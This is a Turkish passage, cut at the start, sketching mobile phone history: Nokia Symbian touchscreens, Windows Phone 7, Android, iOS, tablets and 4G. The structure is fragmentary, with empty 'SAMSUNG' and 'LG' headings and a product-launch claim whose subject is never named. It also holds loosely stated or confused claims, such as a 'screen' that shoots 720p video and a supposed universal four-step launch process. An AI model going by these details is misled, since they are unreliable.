kurmamış ülkelerin var olduğunu (Hindistan bile 2010'dan sonra geçti)
söylemeden geçmemek gerekir.
Nokia Simbian işletim sisteminde ilk kez dokunmalı ekranı olan telefonlar
çıkarttığında bu teknoloji yeniydi. Ekran 720p çözünürlükte video
çekilebiliyordu.
SAMSUNG
LG
Önce Windows Phone 7 ile ürün çıkarttı. Herkes bilir ki piyasaya yeni bir
ürün çıkartmanın dört adımı vardır. İlkinde resim kalitesi sızdırılır, sonra
video, peşinden işlevsel özellikler ve sonunda resmi tanıtım yapılır.
Hafif, hanımların kullanımına uygun, renk çeşitleri çok telefonlarla piyasada
boy gösterdi. Tarayıcılar, mesaj çeşitliliği ve bir çok yenilik telefonlarda boy
göstermeye başladı.
Android ve iOS teknolojisi
Android ve iOS teknolojileri akıllı telefonlarda yeni bir yaşam boyutu getirdi.
Daha sonra Windows da aynı ortama girdi. Telefonlara tabletler eklendi. 4G
teknolojisine geçildi. Mobil yaşamın boyutu değişti.